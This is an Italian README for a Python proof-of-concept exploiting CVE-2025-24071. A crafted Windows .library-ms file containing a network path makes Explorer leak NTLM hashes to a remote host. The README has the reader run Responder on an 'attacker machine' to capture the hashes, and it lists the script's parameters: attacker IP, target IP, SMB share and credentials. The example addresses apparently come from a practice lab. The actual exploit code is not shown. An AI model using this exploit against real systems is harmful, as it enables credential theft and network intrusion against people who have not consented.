
Script Python per eseguire CVE-2025-24071
Questo progetto rileva e dimostra lo sfruttamento di una vulnerabilità di spoofing di Esplora File di Windows.
Il problema deriva da un file di libreria di Windows (.library-ms) contenente un percorso di rete, sia come allegato diretto sia incorporato in un archivio.
Quando aperto, il file può indurre Windows a divulgare hash NTLM a una posizione di rete remota (potenzialmente dannosa).
Sulla tua macchina attaccante, esegui Responder per catturare gli hash NTLM:
sudo responder -I tun0 -wvF
Puoi configurare lo script in due modi:
✅ Opzione A: Modifica i valori predefiniti (più semplice)
Modifica i parametri predefiniti direttamente nello script.
parser.add_argument("--attacker-ip", default="10.10.14.14", help="IP dell'attaccante") #il tuo IP
parser.add_argument("--target-ip", default="10.129.232.88", help="IP del bersaglio") #IP del bersaglio
parser.add_argument("--share-name", default="IT", help="Nome della condivisione SMB") #nome della condivisione a cui hai accesso senza /
parser.add_argument("--username", default="USERNAME", help="Nome utente SMB") #nome utente del proprietario della condivisione
parser.add_argument("--password", default="PASSWORD", help="Password SMB") #password del proprietario della condivisione
parser.add_argument("--interface", default="tun0", help="Interfaccia di rete di Responder") #controlla ifconfig; tun0 funzionerà se sei su una VPN
return parser.parse_args()
✅ Opzione B: Esegui con parametri da riga di comando
Esegui con argomenti:
python3 CVE-2025-24071.py \
--attacker-ip <IP_ATTACCANTE> \
--target-ip <IP_BERSAGLIO> \
--share-name <NOME_CONDIVISIONE> \
--username <NOME_UTENTE> \
--password <PASSWORD> \
--interface <INTERFACCIA>